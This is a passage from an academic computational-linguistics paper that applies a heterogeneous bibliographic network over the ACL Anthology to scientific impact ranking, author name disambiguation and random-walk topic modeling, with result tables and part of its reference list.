3), and topic modeling (Section 4). The hetero- geneous network representation provides a simple framework for combining lexical networks (like the term co-occurence network) with metadata relations from a source like AAN and allows us to begin to develop NLP-aware methods for problems like sci- entometrics and name disambiguation, which are not usually framed in an NLP perspective. 1For a joint meeting of venues A and B publishing a paper x, two edges (x, A) and (x, B) are created. 2Author-affiliation edges are weighted according to the number of papers an author has published from an institution. 1 Transactions of the Association for Computational Linguistics, 2 (2014) 1–14. Action Editor: Lillian Lee. Submitted 3/2013; Revised 6/2013; Published 2/2014. c©2014 Association for Computational Linguistics. 2 Scientific Impact Measurement The study of scientometrics, which attempts to quantify the scientific impact of papers, authors, etc. has received much attention recently, even within the NLP community. In the past few years, there have been many proposed measures of scientific im- pact based on relationships between entities. Intu- itively, a model that can take into account many dif- ferent types of relationships between entities should be able to measure scientific impact more accu- rately than simpler measures like citation counts or h-index. We propose using Pagerank on the heterogeneous AAN (Page et al., 1999) to measure scientific impact. Since changes in the network schema can affect the relative rankings between different types of entities, this method is probably not appropriate for compar- ing entities of two different types against each other. But between nodes of the same type, this measure is an appropriate (and as we will show, accurate) way to compare impacts. We see this method as a first logical step in the direction of heterogeneous network-based sciento- metrics. This method could easily be extended to use a directed schema (Kurland and Lee, 2005) or a schema that is aware of the lexical content of citation sentences, such as sentiment-based signed networks (Hassan et al., 2012). Determining the intrinsic quality of scientific im- pact measures can be difficult since there is no way to collect gold standard measurements for real- world entities. Previous studies have attempted to show that their measures give high scores to a few known high-impact entities, e.g. Nobel prize win- ners (Hirsch, 2005), or have performed a statistical component analysis to find the most important mea- sures in a group of related statistics (Bollen et al., 2009). Our approach, instead, is to generate real- istic data from synthetic entities whose impacts are known. We had considered alternative formulations that did not rely on synthetic data, but each of them presented problems. When we attempted manual prominence annotation for AAN data, the inter- judge agreement (measured by Spearman correla- tion) in our experiments ranged from decent (0.9 in the case of institutions) to poor (0.3 for authors) to nearly random (0.03 for terms), far too low to use in most cases. We also considered evaluating prominence measures by their ability to predict fu- ture citations to an entity. Citations are often used as a proxy for impact, but our measurements have found that correlation between past citations and fu- ture citations is too high for citation prediction to be a meaningful evaluation3. 2.1 Creating a synthetic AAN In network theory, a common technique for testing network algorithms when judgments of real-world data are expensive or impossible to obtain is to test the algorithm on a synthetic network. To create such a synthetic network, the authors define a simple, but realistic generative process by which the real-world networks of interest may arise. The properties of the network are measured to ensure that it replicates certain observable behaviors of the real-world net- work. They can then test network algorithms to see how well they are able to recover the hidden param- eters that generated the synthetic network. (Pastor- Satorras and Vespignani, 2001; Clauset et al., 2009; Karrer and Newman, 2011) We take a two-step approach to generating this synthetic data, first generating entities with known impacts, and second, linking these entities together according to their latent impacts. Our heuristic is that high impact entities should be linked to other high impact entities and vice-versa. As in the net- work theory literature, we must show that this data reflects important properties observed in the true AAN. One such property is that the number of citations per paper follows a power law distribution (Redner, 1998). We observe this behavior in AAN along with several other small-world behaviors, such as a small diameter, a small average shortest path length, and a high clustering coefficient in the coauthorship graph. We strive to replicate these properties in our syn- thetic data. 3Most existing impact measurements require access to at least one year’s worth of citation information. The Spearman correlation between the number of citations received after one year and after five years is 0.79 with correlation between suc- cessive years as high as 0.99. Practically this means that the measures that best correlate with citations after five years are exactly those that best correlate with citations after one year. 2 Since scientific impact measures attempt to quan- tify the true impact of entities, we can use these mea- sures to help understand how the true impact mea- sures are distributed across different entities. In fact, citation counts, being a good estimate of impact, can be used to generate these latent impact variables for each entity. For each type of entity (papers, authors, institutions, venues, and terms), we create a latent impact by sampling from the appropriate citation count distribution. After sampling, all the impacts are normalized to fall in the [0,1] interval, with the highest-impact entity of each type having a latent impact of 1. Additive smoothing is used to avoid having an impact of 0. Once we have created the entities, our method for placing edges is most similar to the Erdős- Réyni method for creating random graphs (Erdős and Rényi, 1960), in which edges are distributed uniformly at random between pairs of vertices. In- stead of distributing links uniformly, links between entities are sampled proportionally to I(a)I(b)(1 − (I(a) − I(b))2), where I(x) is the latent impact of entity x. We tried several other formulae that failed to replicate the properties of the real AAN. The I(a)I(b) part of the formula above reflects a pref- erence for nodes of any type to connect with high- impact entities (e.g., major conferences receive many submissions even though most submissions will be rejected), but the 1 − (I(a) − I(b))2 part also reflects the reality that entities of similar promi- nence are most likely to attach to each other (e.g., well-known authors publish in major conferences, while less well-known authors may publish mostly in lesser-known workshops). Using this distribution, we randomly sample links between papers and authors; authors and institu- tions; papers and venues; and papers and terms. The only exception to this was paper-to-paper citation links, for which we did not expect this same be- havior to apply, as low-impact papers regularly cite high-impact papers, but not vice-versa. To model ci- tations, we selected citing papers uniformly at ran- dom and cited papers in proportion to their impacts. (Albert and Barabási, 2002) Finally, we generated a network equal in size to AAN, that is, with the exact same numbers of pa- pers, authors, etc. and the exact same number of Relationship True value Synth. value Paper-citations power law coeff. 1.82 2.12 Diameter 9 8 Avg. shortest path 4.27 4.05 Collaboration network clustering coeff. 0.34 0.26 Table 1: Network properties of the synthetic AAN compared with the true AAN. paper-author links, paper-venue links, etc. Table 1 compares the observed properties of the true AAN with the observed properties of this synthetic version of AAN. None of the statistics are exact matches, but when building random graphs, it is not uncommon for measures to differ by many orders of magnitude, so a model that has measures that are on the same order of magnitude as the observed data is generally considered to be a decent model (Newman and Park, 2003). 2.2 Measuring impact on the synthetic AAN This random network is, of course, still imperfect in some regards. First of all, it has no time aspect, so it is not possible for impact to change over time, which means we cannot test against some impact measures that have a time component like CiteR- ank (Maslov and Redner, 2008). Second, there are some constraints present in the real world that are not enforced here. Because the edges are randomly selected, some papers have no venues, while others have multiple venues. There is also nothing to en- force certain consistencies, such as authors publish- ing many papers from relatively few institutions, or repeatedly collaborating with the same authors. We had also considered using existing random graph models such as the Barabási-Albert model (Barabási and Albert, 1999), which are known to produce graphs that exhibit power law behavior. These models, however, do not provide a way to re- spect the latent impacts of the entities, as they add links in proportion only to the number of existing links a node has. We measure the quality of impact measures by comparing ranked lists: the ordering of the entities 3 Paper measure Agreement Heterogeneous network Pagerank 0.773 Citation network Pagerank 0.558 Citation count 0.642 Author measure Agreement Heterogeneous network Pagerank 0.461 Coauthorship network Pagerank 0.244 h-index (Hirsch, 2005) 0.292 Aggregated citation count 0.236 i10-index 0.235 Institution measure Agreement Heterogeneous network Pagerank 0.373 h-index (Mitra, 2006) 0.334 Aggregated citation count 0.327 Venue measure Agreement Heterogeneous network Pagerank 0.449 h-index (Braun et al., 2006) 0.425 Aggregated citation count 0.370 Impact factor 0.092 Venue citation network Pagerank (Bollen et al., 2006) 0.366 Table 2: Agreement of various impact measures with the true latent impact. by their true (but hidden) impact against their order- ing according to the impact measure. The agree- ment between these lists is measured by Kendall’s Tau. Table 2 compares several well-known impact measures with our impact measure, Pagerank cen- trality on the heterogeneous AAN network. We find that some popular methods, such as h-index (Hirsch, 2005) are too coarse to accurately capture much of the underlying variation. There is a version of Kendall’s Tau that accounts for ties, and while this metric slightly helps the coarser measures, Pagerank on the heterogeneous network is still the clear win- ner. When comparing different ordering methods, it is natural to wonder which of entities the orderings disagree on. In general, non-heterogeneous mea- sures like h-index or collaboration network Pager- ank, which only focus on one type of relationship can suffer when the entity in question has an impor- tant relationship of another type. For example, if an author is highly cited, but mostly works alone, his 1985 1990 1995 2000 2005 2010 20 40 60 80 100 120 R el at iv e Pa ge ra nk ACL EMNLP COLING NAACL Figure 1: Evolution of conference impacts. The y- axis measures relative Pagerank, the entity’s Pager- ank relative to the average Pagerank in that year. contribution would be undervalued in the collabo- ration network, but would be more accurate in the heterogeneous network. The majority of the differences between the im- pact measures, though, tend to be in how they han- dle entities of low prominence. It seems that, for the most part, there is relatively little disagreement in the orderings of high-impact entities between differ- ent impact measures. That is, most highly prominent entities tend to be highly rated by most measures. But when an author or a paper, for example, only has one or two citations, it can be advantageous to look at more types of relationships than just citations. The paper may be written by an otherwise prominent author, or published at a well-known venue, and hav- ing many types of relations at its disposal can help a method like heterogeneous network Pagerank better distinguish between two low-prominence entities. 2.3 Top-ranked entities according to heterogeneous network PageRank Table 3 shows the papers, authors, institutions, venues, and terms that received the highest Pager- ank in the heterogeneous AAN. It is obvious that the top-ranked entities in this network are not simply the most highly cited entities. This ranking also does not have any time bias toward the entities that are currently prominent, as some of the top authors were more prolific in previ- ous decades than at the current time. We also see this effect with COLING, which for many of the early years, is the only venue in the ACL Anthology. 4 Top Papers Top Authors Top Institutions Top Venues Top Terms − Building A Large Annotated Corpus Of English: The Penn Treebank 4 15 Jun’ichi Tsujii 4 8 Carnegie Mellon University 4 1 COLING − translation − The Mathematics Of Statistical Machine Translation: Parameter Estimation 4 7 Aravind K. Joshi 4 1 University of Edinburgh 5 1 ACL 4 3 speech − Attention, Intentions, And The Structure Of Discourse 4 18 Ralph Grishman 5 2 University of Pennsylvania 4 2 HLT 5 1 parsing − A Maximum Entropy Approach To Natural Language Processing 4 75 Hitoshi Isahara 5 2 Massachusetts Institute of Technology 4 4 EACL 5 1 machine translation − BLEU: a Method for Automatic Evaluation of Machine Translation 4 20 Yuji Matsumoto 4 12 Saarland University 4 7 LREC 4 3 generation − A Maximum-Entropy-Inspired Parser 4 7 Kathleen R. McKeown 5 2 IBM T.J. Watson Research Center − NAACL 4 3 evaluation 4 2 A Stochastic Parts Program And Noun Phrase Parser For Unrestricted Text 4 13 Eduard Hovy 4 39 CNRS 5 3 EMNLP 4 6 grammar 5 1 A Systematic Comparison of Various Statistical Alignment Models 4 10 Christopher D. Manning 4 26 University of Tokyo 5 5 Computational Linguistics 4 16 dialogue 4 4 Transformation-Based Error-Driven Learning and Natural Language Processing: a Case Study in Part-of-Speech Tagging 4 93 Yorick Wilks 5 4 Stanford University 4 4 IJCNLP 4 10 knowl- edge 4 1 A Maximum Entropy Model for Part-of-Speech Tagging 5 9 Hermann Ney 4 3 BBN Technologies 4 1 Workshop on Speech and Natural Language 4 1 discourse Table 3: The entities of each type receiving the highest scores from the heterogeneous network Pagerank impact measure along with their respective changes in ranking when compared to a simple citation count measure. One possible way to address this is to use a narrower time window when creating the graph, such as only including edges from the previous five years. We apply this technique in the following section. 2.4 Entity impact evolution The heterogeneous graph formalism also provides a natural way to study the evolution of impact over time, as in (Hall et al., 2008), but at a much finer granularity. Hall et al. measured the year-by-year prominence of statistical topics, but we can measure year-by-year prominence for any entity in the graph. To measure the evolution of impacts over the years, we iteratively create year-by-year versions of the heterogeneous AAN. Each of these graphs con- tains all entities along with all edges occurring in a five year window. Due to space, we cannot com- prehensively exhibit this technique and the data it produces, but as a brief example, in Figure 1, we show how the impacts of some major NLP confer- ences changes over time. The graph shows that NAACL and EMNLP have been steadily gaining prominence since their intro- ductions, but also shows that ACL has had to make up a lot of ground since 1990 to surpass COLING. We also notice that all the major conferences have grown in impact since 2005, and believe that as the field continues to grow, the major conferences will continue to become more and more important. 3 Name Disambiguation We frame network name disambiguation in a link prediction setting (Taskar et al., 2003; Liben-Nowell and Kleinberg, 2007). The problems of name dis- ambiguation and link prediction share many char- acteristics, and we have found that if two ambigu- ous name nodes are close enough to be selected by a link-prediction method, then they likely correspond to the same real-world author. We intend to show that the heterogeneous biblio- graphic network can be used to better disambiguate author names than the author collaboration network. The heterogeneous network for this problem con- tains papers, authors, terms, venues, and institutions. We compare several well-known network similarity measures from link prediction by transforming the 5 Network Distance Measure Precision Recall F1-score Rand index Purity NMI Heterogeneous Truncated Commute Time 0.59 0.78 0.63 0.63 0.71 0.43 Heterogeneous Shortest Path 0.90 0.79 0.83 0.87 0.94 0.76 Heterogeneous PropFlow 0.89 0.83 0.84 0.87 0.93 0.77 Coauthorship Truncated Commute Time 0.47 0.80 0.54 0.47 0.60 0.18 Coauthorship Shortest Path 0.54 0.73 0.60 0.61 0.67 0.31 Coauthorship PropFlow 0.57 0.76 0.64 0.66 0.71 0.43 Coauthorship GHOST 0.89 0.60 0.69 0.81 0.94 0.63 Table 4: Performance of different networks and distance measures on the author name disambiguation task. The performance measures are averaged over the sets of two, three, and four authors. Rand index is from (Rand, 1971) and NMI is an abbreviation for normalized mutual information (Strehl and Ghosh, 2003) similarities to distances and inducing clusters of au- thors based on these distances. We compare three distance measures: shortest path, truncated commute time (Sarkar et al., 2008), and PropFlow (Lichtenwalter et al., 2010). Short- est path distance can be a useful metric for author disambiguation because it is small when two am- biguous nodes are neighbors in the graph or share a neighbor. Its downside is that it only considers one path between nodes, the shortest, and cannot take advantage of the fact that there may be many short paths between two nodes. Truncated commute time is a variant of commute time where all paths longer than some threshold are truncated. The truncation threshold l should be set such that no semantically meaningful path is trun- cated. We use a value of ten for l in the heteroge- neous graph and three in the coauthorship graph4. The advantage of truncated commute time over or- dinary commute time is simpler calculation, as no paths longer than l need be considered. The down- side of this method is that large branching factors tend to lead to less agreement between commute time and truncated commute time. PropFlow is a quantity that measures the proba- bility that a non-intersecting random walk starting at node a reaches node b in l steps or fewer, where l is again a threshold. As before, l should be a bound on the length of semantically meaningful paths, so we use the same values for l as with truncated commute time. Of course, PropFlow is not a metric, which is 4This is a standard coauthorship graph with the edge weights equal to the number of publications shared between authors. The heterogeneous network does not have author-to-author links, as authors are linked by paper nodes. required for some clustering methods. We use the following equation to transform PropFlow to a met- ric: d(a,b) = 1 PropFlow(a,b) −1. With each of the distance measures, we apply the same clustering method: partitioning around medoids, with the number of clusters automatically determined using the gap statistic method (Tibshi- rani et al., 2001). We create the null distribution needed for the gap statistic method by many itera- tions of randomly sampling distances from the com- plete distance matrix between all nodes in the graph. The gap statistic method automatically selects the number of clusters from two, three, or four author clusters. We compare our methods against GHOST (Fan et al., 2011), a high-performance author disambigua- tion method based on the coauthorship graph. 3.1 Data To generate name disambiguation data, we use the pseudoword method of (Gale et al., 1992). Specif- ically, we choose two or more completely random authors and conflate them by giving all instances of both authors the same name. We let each paper written by this pseudoauthor be an instance to be clustered. The clusters produced by any author dis- ambiguation method can then be compared against the papers actually written by each of the two au- thors. This method, of course, relies on having all of the underlying authors completely disambiguated, which AAN provides. This method is used to create 100 distambiguation sets with two authors, 100 for three authors, and 100 for four authors. 6 3.2 Results Table 4 shows the performance of author name dis- ambiguation with different networks and distance metrics. F1-score is the measure that is most of- ten used to compare author disambiguation methods. Both PropFlow and shortest path similarity on the heterogeneous network perform quite well accord- ing this measure, as well as the other reported mea- sures. While comparable recall can be achieved us- ing only the coauthorship graph, the heterogeneous graph allows for much higher precision. 4 Random walk topic model Here we present a topic model based entirely on graph random walks. This method is not truly a statistical model as there are no statistical parame- ters being learned, but rather a topic-discovery and -assignment method, attempting to solve the same problem as statistical topic models such as proba- bilistic latent semantic analysis (pLSA) (Hofmann, 1999) or latent Dirichlet allocation (LDA) (Blei et al., 2003). In the absence of better terminology, we use the name random walk topic model. While this method does not have the robust math- ematical foundation that statistical topic models pos- sess, in its favor it has modularity, simplicity, and interpretability. This language model is modular as it completely separates the discovery of topics from the association of topics with entities. It is sim- ple because it requires only a clustering algorithm and random walk algorithms, instead of complex in- ference algorithms. The method also does not re- quire any modification if the topology of the net- work changes, whereas statistical models may need an entirely different inference procedure if, e.g., au- thor topics are desired in addition to paper topics. Thirdly this method is easily interpretable with top- ics provided by clustering in the word-relatedness graph and topic association based on random walks from entities to topics. 4.1 Topics from word graph clustering From the set of ACL anthology titles, we create two graphs: (1) a word relatedness graph by cre- ating a weighted link between each pair of words corresponding to the PropFlow (Lichtenwalter et al., 2010) measure between them on the full heteroge- neous graph and (2) a word co-occurence graph by creating a weighted link between each pair of words corresponding to the number of titles in which both words occur. Both of these graphs are then clustered using Graph Factorization Clustering (GFC). GFC is a soft clustering algorithm for graphs that models graph edges as a mixture of latent node-cluster association variables. (Yu et al., 2006) Given a word graph G with vertices V and ad- jacency matrix [w]ij, GFC attempts to fit a bipar- tite graph K(V,U) with adjacency matrix [b]ij onto this data, with the m nodes of U representing the clusters. Whereas in G, similarity between two words i and j can be measured with wij, we can similarly measure their similarity in K with w′ij =∑m p=1 bipbjp λp where λp = ∑n i=1 bip is the degree of vertex p ∈ U. Essentially the bipartite graph attempts to approx- imate the transition probability between i and j in G with the sum of transition probabilities from i to j through any of the m nodes in U. Yu, et al. (2006) present an algorithm for minimizing the divergence distance `(X,Y) = ∑ ij(xijlog xij yij −xij + yij) be- tween [w]ij and [w′]ij. We run GFC with this distance metric and m = 100 clusters on the word graph until convergence (change in log-likelihood < 0.1%). After conver- gence, the nodes in U become the clusters and the weights bip (constrained to sum to 1 for each clus- ter) become the topic-word association scores. Examples of some topics found by this method are shown in Table 5. From manual inspection of these topics, we found them to be very much like topics created by statistical topic models. We find instances of all the types of topics listed in (Mimno et al., 2011): chained, intruded, random, and unbal- anced. For an evaluation of these topics see Sec- tion 4.3.1. 4.2 Entity-topic association To associate entities with topics, we first create the heterogeneous network as in previous sections, adding links between papers and their title words, along with links between words and the topics that were discovered in the previous section. Word-topic links are also weighted according to the weights 7 Word sense induction sense disambiguation word induction unsupervised clustering senses based similarity chinese CRFs + their applications entity named recognition random conditional fields chinese entities biomedical segmentation Dependency parsing parsing dependency projective probabilistic incremental deterministic algorithm data syntactic trees Tagging models tagging model latent markov conditional random parsing unsupervised segmentation Multi-doc summarization summarization multi document text topic based query extractive focused summaries Chinese word segmentation word segmentation chinese based alignment character tagging bakeoff model crf Lexical semantics lexical semantic distributional similarity wordnet resources lexicon acquistion semantics representation Cross-lingual IR cross lingual retrieval document language linguistic multi person multilingual coreference Generation for summar. sentence based compression text summarization ordering approach ranking generation Spoken language speech recognition automatic prosodic tagging spontaneous news broadcast understanding conversational French function words de la du des le automatique analyse une en pour Question answering question answering system answer domain retrieval web based open systems Unsupervised learning unsupervised discovery learning induction knowledge graph acquisition concept clustering pattern SVMs for NLP support vector machines errors space classification correcting word parsing detecting MaxEnt models entropy maximum approach based attachment model models phrase prepositional disambiguation Dialogue systems dialogue spoken systems human conversational multi interaction dialogues utterances multimodal Semantic role-labeling semantic role labeling parsing syntactic features ill dependency formed framenet SMT based translation machine statistical phrase english approach learning reordering model Coreference resolution resolution coreference anaphora reference pronoun ellipsis ambiguity resolving approach pronominal Semi- and weak-supervision learning supervised semi classification active data clustering approach graph weakly Information retrieval based retrieval similarity models semantic space model distance measures document Discourse discourse relations structure rhetorical coherence temporal representation text connectives theory CFG parsing context free grammars parsing linear probabilistic rewriting grammar systems optimal Min. risk train. and decod. minimum efficient training error rate translation risk bayes decoding statistical Phonology phoneme conversion letter phonological grapheme rules applying transliteration syllable sound Sentiment sentiment opinion reviews classification mining polarity analysis predicting product features Neural net speech recog. speech robust recognition real network time neural networks language environments Finite state methods state finite transducers automata weighted translation parsing incremental minimal construction Mechanical Turk mechanical turk automatic evaluation amazon techniques data articles image scientific Table 5: Top 10 words for several topics created by the co-occurence random walk topic model. The left column is a manual label. Topic 59 Topic 82 translation 0.1953 parsing 0.1715 machine 0.1802 dependency 0.1192 statistical 0.0784 projective 0.0138 Machine Translation 0.0018 K-best Spanning Tree Parsing 0.0025 Better Hypothesis Testing for Statistical Machine Translation: Controlling for Optimizer Instability 0.0016 Pseudo-Projective Dependency Parsing 0.0024 Filtering Antonymous, Trend- Contrasting, and Polarity-Dissimilar Distributional Paraphrases for Improving Statistical Machine Translation 0.0015 Shift-Reduce Dependency DAG Parsing 0.0017 Knight, Kevin 0.0083 Nivre, Joakim 0.0120 Koehn, Philipp 0.0074 Johnson, Mark 0.0085 Ney, Hermann 0.0072 Nederhof, Mark-Jan 0.0064 RWTH Aachen University 0.0212 Vaxjo University 0.0113 Carnegie Mellon University 0.0183 Brown University 0.0107 University of Southern California 0.0177 University of Amsterdam 0.0094 Workshop on Statistical Machine Translation 0.0590 ACL 0.0512 EMNLP 0.0270 EMNLP 0.0259 COLING 0.0173 CoNLL 0.0223 Table 6: Examples of entities associated with selected topics. 8 determined by GCF. We then simply take random walks from topics to entities and measure the pro- portion at which the random walk arrives at each en- tity of interest. These proportions become the entity- topic association scores. For example, if we wanted to find the authors most associated with topic 12, we would take a num- ber of random walks (say 50,000) starting at topic 12 and terminating as soon as the random walk first reaches an author node. Measuring the proportion at which random walks arrive at each allows us to compute an association score between topic 12 and each author. A common problem in random walks on large graphs is that the walk can easily get “lost” between two nodes that should be very near by taking a just a few steps in the wrong direction. To keep the ran- dom walks from taking these wrong steps, we adjust the topology of the network using directed links to keep the random walks moving in the “right” direc- tion. We design the graph such that if we desire a random walk from nodes of type s to nodes of type t, the random walk will never be able to follow an out- going link that does not decrease its distance from the nodes of t. As shown in section 2.3, there are certain nodes at which a random walk (like Pagerank) arrives at more often than others simply because of their positions in the graph. This suggests that there may be stationary random walk distributions over entities, which we would need to adjust for in order to find the most significant entities for a topic. Indeed this is what we do find. As an example, if we sample topics uniformly and take random walks to author nodes, by chance we end up at Jun’ichi Tsujii on 0.3% of random walks, Eduard Hovy on 0.2% of walks, etc. These values are about 1000 times greater than would be expected at random. To adjust for this effect, when we take a random walk from a topic x to an entity type t, we subtract out this stationary distribution for t, which corre- sponds to the proportion of random walks that end at any particular entity of type t by chance, and not by virtue of the fact that the walk started at topic x. The resulting distribution yields the entities of t that are most significantly associated with topic x. Ta- ble 6 gives examples of the most significant entities for a couple of topics. −200 −150 −100 −50 RW-cooc RW-sim RTM LDA Coherence Figure 2: Distribution of topic coherences for the four topic models. 4.3 Topic Model Evaluation We provide two separate evaluations in this section, one of the topics alone, and one extrinstic evaluation of the entire paper-topic model. The variants of ran- dom walk topic models are compared against LDA and the relational topic model (RTM), each with 100 topics (Chang and Blei, 2010). As RTM allows only a single type of relationship between documents, we use citations as the inter-document relationships. 4.3.1 Topic Coherence The coherence of a topic is evaluated using the co- herence metric introduced in (Mimno et al., 2011). Given the top M words V (t) = (v(t)1 , ...,v (t) M ) for a topic t, the coherence of that topic can be calculated with the following formula: C(t;V (t)) = M∑ m=2 m−1∑ l=1 log ( D(v (t) m ,v (t) l ) + 1 D(v (t) l ) ) , where D(v) is the number of documents contain- ing v and D(v,v′) is the number of documents con- taining both v and v′. This measure of coherence is highly correlated with manual annotations of topic quality, with a higher coherence score corresponding to a more co- herent, higher quality topic. After calculating the co- herence for each of the 100 topics for RTM and the random-walk topic model, the average coherence for RTM topics was -135.2 and the average coherence for word-similarity random walk topics was -122.2, with statistical significance at p < 0.01. Figure 2 demonstrates this, showing that the word similarity- based random walk method generates several highly coherent topics. The average coherence for the LDA and the co-occurence random walk model were sig- nificantly lower. 9 4.3.2 Extrinsic Evaluation One difficulty in evaluating this random-walk topic model intrinsically against a statistical topic model like RTM is that existing evaluation measures assume certain statistical properties of the topic, for example, that the topics are generated according to a Dirichlet prior. Because of this, we choose instead to evaluate this topic model extrinsically with a down- stream application. We choose an information re- trieval application, returning a ranked list of similar documents, given a reference document. We evaluate five different methods: citation- RTM, LDA, the two versions of the random-walk topic model, and a simple word vector similarity baseline. Similarity between documents with the topic models are determined by cosine similarity be- tween the topic vectors of the two documents. Word vector similarity determines the similarity between documents by taking the cosine similarity of their word vectors. From these similarity scores, a ranked list is produced. The document set for this task is the set of all pa- pers appearing at ACL between 2000 and 2011. The top 10 results returned by each method are pooled and manually evaluated with a relevance score be- tween 1 and 10. Thirty such result sets were manu- ally annotated. We then evaluate each method ac- cording to its discounted cumulative gain (DCG) (Järvelin and Kekäläinen, 2000). Performance of these methods is summarized in Table 7. The co-occurence-based random walk topic model performed comparably with the best per- former at this task, LDA, and there was no signifi- cant difference between the two at p < 0.05. Going forward, an important problem is to rec- oncile the co-occurence- and word-similarity-based formulations of this topic model, as the two formu- lations perform very differently in our two evalua- tions. Heuristically, the co-occurence model seems to create good human-readable topics, while the word-similarity model creates topics that are more mathematically-coherent, but less human-readable. 5 Related Work Heterogeneous networks have been studied in a number of different fields, such as biology (Sio- son, 2005), transportation networks (Lozano and Method DCG Word vector 1.345 ± 0.007 LDA 3.302 ± 0.008 RTM 3.058 ± 0.011 Random-walk (cooc) 3.295 ± 0.006 Random-walk (sim) 2.761 ± 0.007 Table 7: DCG Performance of the various topic models and baselines on the related document find- ing task. A 95% confidence interval is provided. Storchi, 2002), social networks (Lambiotte and Aus- loos, 2006), and bibliographic networks (Sun et al., 2011). These networks are also sometimes known by the name complex networks or multimodal net- works, but both these terms have other connotations. We prefer “heterogeneous networks” as used by Sun et al. (2009). There has also been some study of these networks in general, in community detection (Murata, 2010), clustering (Long et al., 2008; Sun et al., 2012), and data mining (Muthukrishnan et al., 2010), but there has not yet been any comprehensive study. Recently, NLP has seen several uses of heterogeneous net- works (though not by that name) for use with label propagation algorithms (Das and Petrov, 2011; Spe- riosu et al., 2011) and random walks (Toutanova et al., 2004; Kok and Brockett, 2010). Several authors have proposed the idea of using network centrality measures to rank the impacts of journals, authors, papers, etc. (Bollen et al., 2006; Bergstrom et al., 2008; Chen et al., 2007; Liu et al., 2005), and it has even been proposed that central- ity can be applicable in bipartite networks (Zhou et al., 2007). We propose that Pagerank on any gen- eral heterogeneous network is appropriate for creat- ing ranked lists for each type of entity. Most previ- ous papers also lack a robust evaluation, demonstrat- ing agreement with previous methods or with some external awards or recognitions. We use a random graph that replicates the properties of the real-world network to show that Pagerank on the heterogeneous network outperforms other methods. Name disambiguation has been studied in a num- ber of different settings, including graph-based set- tings. It is common to use the coauthorship graph (Kang et al., 2009; Fan et al., 2011), but authors 10 have also used lexical similarity graphs (On and Lee, 2007), citation graphs (McRae-Spencer and Shad- bolt, 2006), or social networks (Malin, 2005). Al- most all graph methods are unsupervised. There have been some topic models developed specifically for relational data (Wang et al., 2006; Airoldi et al., 2008), but both of these models have limitations in the types of relational data they are able to model. The group topic model described in (Wang et al., 2006) is able to create stronger topics by considering associations between words, events, and entities, but is very coarse in the way it han- dles the behavior of entities, and does not generalize to multiple different types of entities. The stochas- tic blockmodel of (Airoldi et al., 2008) can create blocks of similar entities in a graph and is general in the types of graphs it can handle, but produces less meaningful results on graphs that have specific schemas. 6 Conclusion and Future Directions In this paper, we present a heterogeneous net- work treatment of the ACL Anthology Network and demonstrate several applications of it. Using only off-the-shelf graph algorithms with a single data rep- resentation, the heterogeneous AAN, we are able to very easily build a scientific impact measure that is more accurate than existing measures, an author dis- ambiguation system better than existing graph-based author disambiguation systems, and a random-walk- based topic model that is competitive with statistical topic models. While there are many other tasks, such as citation- based summarization, that could likely be ap- proached using this framework with the appropri- ate addition of new types of nodes into the hetero- geneous AAN network, there are even some poten- tial synergies between the tasks described in this pa- per that have yet to be explored. For example, we may consider that the methods of the author disam- biguation or topic modeling tasks could be to find the highest-impact papers associated with a term (for survey generation, perhaps) or high-impact authors associated with a workshop’s topic (to select good reviewers for it). We believe that heterogeneous graphs are a flexible framework that will allow re- searchers to find simple, flexible solutions for a va- riety of problems. Acknowledgments This research is supported by the Intelligence Advanced Research Projects Activity (IARPA) via Department of Interior National Business Center (DoI/NBC) contract number D11PC20153. The U.S. Government is autho- rized to reproduce and distribute reprints for Governmen- tal purposes notwithstanding any copyright annotation thereon. Disclaimer: The views and conclusions con- tained herein are those of the authors and should not be interpreted as necessarily representing the official poli- cies or endorsements, either expressed or implied, of IARPA, DoI/NBC, or the U.S. Government. References Edoardo M. Airoldi, David M. Blei, Stephen E. Fienberg, and Eric P. Xing. 2008. Mixed membership stochastic blockmodels. The Journal of Machine Learning Re- search, 9:1981–2014. Réka Albert and Albert-László Barabási. 2002. Statisti- cal mechanics of complex networks. Reviews of mod- ern physics, 74(1):47. A.L. Barabási and R. Albert. 1999. Emergence of scal- ing in random networks. Science, 286(5439):509–512. Carl T. Bergstrom, Jevin D. West, and Marc A. Wiseman. 2008. The eigenfactor metrics. The Journal of Neuro- science, 28(45):11433–11434. Steven Bird, Robert Dale, Bonnie J Dorr, Bryan Gib- son, Mark Joseph, Min-Yen Kan, Dongwon Lee, Brett Powley, Dragomir R Radev, and Yee Fan Tan. 2008. The ACL anthology reference corpus: A reference dataset for bibliographic research in computational lin- guistics. In Proc. of the 6th International Conference on Language Resources and Evaluation Conference (LREC08), pages 1755–1759. D.M. Blei, A.Y. Ng, and M.I. Jordan. 2003. Latent dirichlet allocation. the Journal of machine Learning research, 3:993–1022. Johan Bollen, Marko A. Rodriguez, and Herbert Van de Sompel. 2006. Journal status. CoRR, abs/cs/0601030. Johan Bollen, Herbert Van de Sompel, Aric Hagberg, and Ryan Chute. 2009. A principal component analysis of 39 scientific impact measures. PloS one, 4(6):e6022. Tibor Braun, Wolfgang Glänzel, and András Schubert. 2006. A hirsch-type index for journals. Scientomet- rics, 69(1):169–173. Jonathan Chang and David M Blei. 2010. Hierarchical relational models for document networks. The Annals of Applied Statistics, 4(1):124–150. 11 Peng Chen, Huafeng Xie, Sergei Maslov, and Sid Redner. 2007. Finding scientific gems with googles pagerank algorithm. Journal of Informetrics, 1(1):8–15. Aaron Clauset, Cosma Rohilla Shalizi, and Mark EJ Newman. 2009. Power-law distributions in empirical data. SIAM review, 51(4):661–703. Dipanjan Das and Slav Petrov. 2011. Unsupervised part- of-speech tagging with bilingual graph-based projec- tions. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Hu- man Language Technologies, pages 600–609. Paul Erdős and Alfréd Rényi. 1960. On the evolution of random graphs. Magyar Tud. Akad. Mat. Kutató Int. Közl, 5:17–61. Günes Erkan and Dragomir R. Radev. 2004. Lexrank: Graph-based lexical centrality as salience in text sum- marization. J. Artif. Intell. Res. (JAIR), 22:457–479. Xiaoming Fan, Jianyong Wang, Xu Pu, Lizhu Zhou, and Bing Lv. 2011. On graph-based name disambigua- tion. J. Data and Information Quality, 2(2):10:1– 10:23, February. William A. Gale, Kenneth W. Church, and David Yarowsky. 1992. Work on statistical methods for word sense disambiguation. In Working Notes of the AAAI Fall Symposium on Probabilistic Approaches to Natu- ral Language, volume 54, page 60. David Hall, Daniel Jurafsky, and Christopher D. Man- ning. 2008. Studying the history of ideas using topic models. In Proceedings of the Conference on Empir- ical Methods in Natural Language Processing, pages 363–371. ACL. Ahmed Hassan, 